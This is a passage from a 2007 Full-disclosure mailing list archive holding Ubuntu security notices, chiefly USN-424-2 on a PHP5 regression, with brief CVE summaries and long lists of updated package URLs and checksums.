aa78ecc4d9dd51b8d4084e152093e6be http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.5.dsc Size/MD5: 690 460f793de7cea304ac0e038bf4e8f348 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2.orig.tar.gz Size/MD5: 4222685 50d8fd9c5715ff78b7db0e5f20d08550 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.5_amd64.deb Size/MD5: 1066892 bebab8ec7afe738b426e080f10af9c37 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.2.2-1ubuntu2.5_amd64.udeb Size/MD5: 140414 8b9f2ca68439062984c4314ba5c0e2d8 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.5_i386.deb Size/MD5: 981952 bd95db0369ba517b3f29ec132676fcc5 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.2.2-1ubuntu2.5_i386.udeb Size/MD5: 120392 188d1f1cb3ec385c444e623d9efcadde powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.5_powerpc.deb Size/MD5: 1054420 0da3379c332cb3786933861ec66c9478 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.2.2-1ubuntu2.5_powerpc.udeb Size/MD5: 130262 c528d3f517f94a50ecd06a10b5767c84 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.2.2-1ubuntu2.5_sparc.deb Size/MD5: 994884 159220ec1a5c667a073e13e63380fd49 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.2.2-1ubuntu2.5_sparc.udeb Size/MD5: 127548 755511f26f78dd7744434601d684404b Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.3.diff.gz Size/MD5: 29804 2f3b7d22a447212c871a1ca6ff754df7 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.3.dsc Size/MD5: 697 54eb12ebf5f4426abe78eb286c32ec35 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3.orig.tar.gz Size/MD5: 4320394 fcdf572a33dd037653707b128dd150a7 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg/gnupg-udeb_1.4.3-2ubuntu3.3_amd64.udeb Size/MD5: 380186 ac0b24986f64b7be4da102509f86ea27 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.3_amd64.deb Size/MD5: 1112634 339bb8b52507096e2a1f9cb75864629f http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.3-2ubuntu3.3_amd64.udeb Size/MD5: 142772 a460f38f4669944e3c8cdbff531b4a41 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg/gnupg-udeb_1.4.3-2ubuntu3.3_i386.udeb Size/MD5: 357730 08dee030fef6b31ba21b92d56b134cad http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.3_i386.deb Size/MD5: 1056104 826246d40bdd92c0b04a0c0d385e4a64 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.3-2ubuntu3.3_i386.udeb Size/MD5: 129176 8d173c26de67072948c7f34dfceb75ae powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg/gnupg-udeb_1.4.3-2ubuntu3.3_powerpc.udeb Size/MD5: 372730 c3dd8be3260d14e82a4af95f37c6616d http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.3_powerpc.deb Size/MD5: 1107684 1a8a6be788ab4afd0c33483f5faa6a1f http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.3-2ubuntu3.3_powerpc.udeb Size/MD5: 136440 ee71f2b32e7e085488e134ba68f89122 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/universe/g/gnupg/gnupg-udeb_1.4.3-2ubuntu3.3_sparc.udeb Size/MD5: 366290 90570b1dafeb0a01862c5768579564a3 http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gnupg_1.4.3-2ubuntu3.3_sparc.deb Size/MD5: 1042784 e8b19dfe7705afbde9c54b223e44dcba http://security.ubuntu.com/ubuntu/pool/main/g/gnupg/gpgv-udeb_1.4.3-2ubuntu3.3_sparc.udeb Size/MD5: 132868 edc923da480a84aa4d060c8d7be58be2 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070307/86cd408c/attachment.bin From kees at ubuntu.com Thu Mar 8 07:04:33 2007 From: kees at ubuntu.com (Kees Cook) Date: Wed, 7 Mar 2007 23:04:33 -0800 Subject: [Full-disclosure] [USN-424-2] PHP regression Message-ID: <20070308070433.GE20498@outflux.net> =========================================================== Ubuntu Security Notice USN-424-2 March 08, 2007 php5 regression https://launchpad.net/bugs/87481 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: libapache2-mod-php5 5.0.5-2ubuntu1.8 php5-cgi 5.0.5-2ubuntu1.8 php5-cli 5.0.5-2ubuntu1.8 php5-common 5.0.5-2ubuntu1.8 Ubuntu 6.06 LTS: libapache2-mod-php5 5.1.2-1ubuntu3.6 php5-cgi 5.1.2-1ubuntu3.6 php5-cli 5.1.2-1ubuntu3.6 php5-common 5.1.2-1ubuntu3.6 Ubuntu 6.10: libapache2-mod-php5 5.1.6-1ubuntu2.3 php5-cgi 5.1.6-1ubuntu2.3 php5-cli 5.1.6-1ubuntu2.3 php5-common 5.1.6-1ubuntu2.3 After a standard system upgrade you need to restart Apache or reboot your computer to effect the necessary changes. Details follow: USN-424-1 fixed vulnerabilities in PHP. However, some upstream changes were not included, which caused errors in the stream filters. This update fixes the problem. We apologize for the inconvenience. Original advisory details: Multiple buffer overflows have been discovered in various PHP modules. If a PHP application processes untrusted data with functions of the session or zip module, or various string functions, a remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0906) The sapi_header_op() function had a buffer underflow that could be exploited to crash the PHP interpreter. (CVE-2007-0907) The wddx unserialization handler did not correctly check for some buffer boundaries and had an uninitialized variable. By unserializing untrusted data, this could be exploited to expose memory regions that were not meant to be accessible. Depending on the PHP application this could lead to disclosure of potentially sensitive information. (CVE-2007-0908) On 64 bit systems (the amd64 and sparc platforms), various print functions and the odbc_result_all() were susceptible to a format string vulnerability. A remote attacker could exploit this to execute arbitrary code with the privileges of the web server. (CVE-2007-0909) Under certain circumstances it was possible to overwrite superglobal variables (like the HTTP GET/POST arrays) with crafted session data. (CVE-2007-0910) When unserializing untrusted data on 64-bit platforms the zend_hash_init() function could be forced to enter an infinite loop, consuming CPU resources, for a limited length of time, until the script timeout alarm aborts the script. (CVE-2007-0988) Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5-2ubuntu1.8.diff.gz Size/MD5: 116518 f7dbd3bd621283d85f0edbb3210c7256 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5-2ubuntu1.8.dsc Size/MD5: 1707 462bc04bc7ed345e0c26649b3d4c000a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5.orig.tar.gz Size/MD5: 6082082 ae36a2aa35cfaa58bdc5b9a525e6f451 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.0.5-2ubuntu1.8_all.deb Size/MD5: 173694 77d975dfce5e55abd5e2269b73a4f786 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.0.5-2ubuntu1.8_all.deb Size/MD5: 1038 a62fc4e66817ae8c6d806786df8221bc amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 2013522 3715bd50b956f12629ae2a6c842bc335 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 3973490 b7b3cf740a90439502fd3623d67f88a0 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 1997794 05c9c691f86d6af835123a5de03f79dc http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 129512 227db2238194369292280dcf04523dcb http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 24030 bf504e4fc48f0c9eadd30819f21db683 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 218772 34e8c8dab570eeb79d5c823f7336ba79 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 35568 b2d455800f9c499a786e0de7f0424bb2 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 20674 e41517d05eba79febbc8086f325e0408 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 8620 67b985ecf80e98403e0ad1724b87e02f http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 24478 e12544b588a81723e58ea0e6ffd3e917 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 29286 2cc7d2c3824658a95aaa1eb8a17144ab http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 40074 532c75f8f98ff0355db5bca114ef8bb5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 8100 b19a083643541a5e4379699fbfe9481b http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 14470 399854b4a04ade2ab40e45ec37dd3899 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 28168 681d9f36e1b56a9b9a54cb563328eb12 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 22222 7fa501834e93014ce3075aba7ff54a7e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 41904 84679d9feca81b76ca359774fe1260b9 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.0.5-2ubuntu1.8_amd64.deb Size/MD5: 15108 6ccfed590dc4e0e60ea40a8206b4996f i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 1869434 ff5a84e6bbb468754aba53e9e7a2feb0 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 3711800 7e1ba6c72ac595f2faf2e5309f96ee51 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 1864658 e1a3302ef94baf3685355bef3bc0eba5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 129502 a621cec9e5336f52b84a7ef03ecbcdf1 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 22196 5d54b4379da6e2b58d96b7be1ed583d8 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 218794 4994f212a937129920fb6df23fb4b2e3 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 31614 e1031a4d321f1dd798478bac7f1da153 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 18536 cccec5d8cb8332122a855e456d8623a1 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 8246 5b1dc23196242984bb193e55cc56495e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 21276 eb724649aa41ad6082cac49c732d9c97 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 26394 c81a979c0788d9a723687569ce490a3d http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 36044 a473377cc9e7c00224a90979ab1b7be8 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 7852 87ab0fe4a1ee7501f34a419f7d4d8e0d http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 13366 36de903ddb2530222c938f8c2fb89f8a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 24736 3fe0441e8850e1bed81ffb5efb677596 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 20114 e4f2dc7c2eb0447def1074b35f3904fd http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 37488 f8daed913dc67fc9e7a56bfc114e1653 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.0.5-2ubuntu1.8_i386.deb Size/MD5: 14026 a2af8cf70cf5a2414a714794dbc72402 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 1984866 6cacbc9982e4abd67522f0bdf1189ef4 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 3909846 4f8527b0d6146ee80e23cecb68f2d620 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 1963174 714fcebf55e90d51dc79a877bc0aabc3 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 129506 5c1018d206288e55364dac03ce303f17 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 25952 74e14b2e7b7758b51890ccfc13d192f3 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 218824 0b8abc063d61c96751ccb9d983ef3b19 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 35492 669b7db95bd0e4c31b9d80f4efbdfc8a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 21138 42dbb813083b42f8aa2b6e6195e72701 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 10006 d5a13e1b092d73bed9f5fdf13358b93c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 23960 4479cdbc2678188962f59a45c9249125 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 29360 4b564041a20b96e6633e1e166b5a81eb http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 39788 daee3675f53c9cac4deea177b25e5c2e http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 9512 5861261c0638fe839f04d0034d600dad http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 15294 2290cfd6a1a01cbf5a6439c7c9f2a92a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 28390 03810ab777ef2be3100c6664b82ced02 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 23186 f9ac5f60506b0d738083cdbaa7047def http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 40468 1474176f1145c6da7a05f2e5c1804b83 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.0.5-2ubuntu1.8_powerpc.deb Size/MD5: 15886 195373f18c7ef935dea68351761052c5 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 1929346 2a55ca8da2ec42c64ce0ce17df816f5b http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 3784258 d8b5a92b3f9ac13fb3ff3d68524c1397 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 1902124 156ba26a9b16b20d6989c536c5df36da http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 129498 0f9f3436b900f6dd84cda4649159621a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 23976 2e8d9ddad1ffa424612758c4e9165e25 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 218782 24f468192d193b378d455e7a637e9b67 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 32022 f0e8ea04a78add3ff37ac2fce5520504 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 18718 248ac49eb611d6217550bc44146dacd0 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 8162 86959e1e5da9e3a8a3cf528d53b65461 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 21580 f82ff611b271002892c187533148f8e1 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 26090 1b00db196e067b5a5f81d6ee47831f97 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 36998 96ac88467685ecbee65c82230b74bfce http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 7814 e4b7998fd921579e43f97541462df072 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 13244 6716008100d1ccbfe86870d8903d008a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 25108 998df2b6ef2ccb8222540032a18f74a5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 20338 5eb345cdfb663ce61f823f787f9d7c96 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 37768 65a09a65e943255632fa69ae0e3dd546 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.0.5-2ubuntu1.8_sparc.deb Size/MD5: 13868 b3069f430b3b44526b2b36cd63caa837 Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.6.diff.gz Size/MD5: 113810 dd65729a26659b699371111cbed6534a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.6.dsc Size/MD5: 1768 ff848ea8ba9d1f2be278bca5d3f5a110 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2.orig.tar.gz Size/MD5: 8064193 b5b6564e8c6a0d5bc1d2b4787480d792 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/php5/php-pear_5.1.2-1ubuntu3.6_all.deb Size/MD5: 301896 e6f04e5762e50d8b2b6f7608cf43f7df http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5_5.1.2-1ubuntu3.6_all.deb Size/MD5: 1038 95773caa93a680f94d23b1ae33b45f7e amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 2432462 366d3f3b5c948b61707f35b169054312 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 4755392 87c10fadfd3b9aff9aeb1f524ff38925 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 2386806 4d8c072ca91a2cf21efe4098f7fbca10 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 133642 d39bf84717c5d95025be81d8fe923063 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 24618 34e51ddbbc71e7b351ad32179fb5e6c4 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 312538 ca7972e71db0e109d37bc8f0782efd59 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 36800 7f5ece4b9c846a889080f0bf84f59df5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 22136 56951b014f3c3b2175981b5a1fb88f64 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 8786 d10e24e1c19238fdbaa2ce323debbcc1 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 25234 13cae2c7c4baa9eff416674e5afcca8c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 43902 1bebd70f4e23123fcc6c1ba08c359437 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 30132 203a22ee1b6808ef291f9116ceb5a502 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 44390 364eea49e820e29c6ab6d36c0791833c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 8344 033cc7959c5f8148814e5f21bec7b113 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 15304 a9266eb9fc8b3c4878cfcacc02253944 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 29188 9fc3b5b2a29a8d34f6fb142c7a1d28d5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 22704 eed1488f4f0721ae39981a4b2908a945 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 42300 b907423b0b397583c7b89f0dbf393c7c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.6_amd64.deb Size/MD5: 16396 ba25d041a221837216173047a107e4d1 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 2260140 cadd2922a4cbab02b93c3a8b93ec7bf6 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 4470258 41c3960c9d749dd726abe31179e29261 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cli_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 2245280 33dcb6181ff30ac9eff1d63a69e91068 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-common_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 133650 a5d4c0f4dc724c52a5f9342172900f2a http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-curl_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 22838 11fae23750caf0a3ef8dbb623e8c22f9 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-dev_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 312560 fddc0cad8c6fdbed839ea40a2f1140a1 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-gd_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 32836 1b89d32c62a978551aabcb3716622918 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-ldap_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 19796 4de23cdb2a013fb6d930312d1a537974 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mhash_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 8374 ae2b87de52739ae896fb4621ffabf6c8 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysql_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 21998 56344802bfc59c6c2f8bb2736714a023 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-mysqli_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 37370 75d6446951987c507f159f6f556bbbaa http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-odbc_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 27042 0e7a01cc4d5d240ecac6b6ededadc46c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-pgsql_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 39792 f07ec1e9758c1a699236f2866625dc6c http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-recode_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 8058 c3771ed16ce6b6269d6eaeded4555a10 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-snmp_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 14160 e537a90f844a0c0c43bf0dab10c80393 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sqlite_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 25634 97661242e7a3a6ab165ae2d138dc1edb http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-sybase_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 20542 fc60e07c2bca2da912f7b8ad007496a5 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xmlrpc_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 37816 0735d68e86a87131178282310f347924 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-xsl_5.1.2-1ubuntu3.6_i386.deb Size/MD5: 15130 0f0e3f1c5cbade2c84c4e9f720f10177 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/p/php5/libapache2-mod-php5_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 2396578 4cc7fe06a0578bbc9a7793db293e7e34 http://security.ubuntu.com/ubuntu/pool/main/p/php5/php5-cgi_5.1.2-1ubuntu3.6_powerpc.deb Size/MD5: 4690482 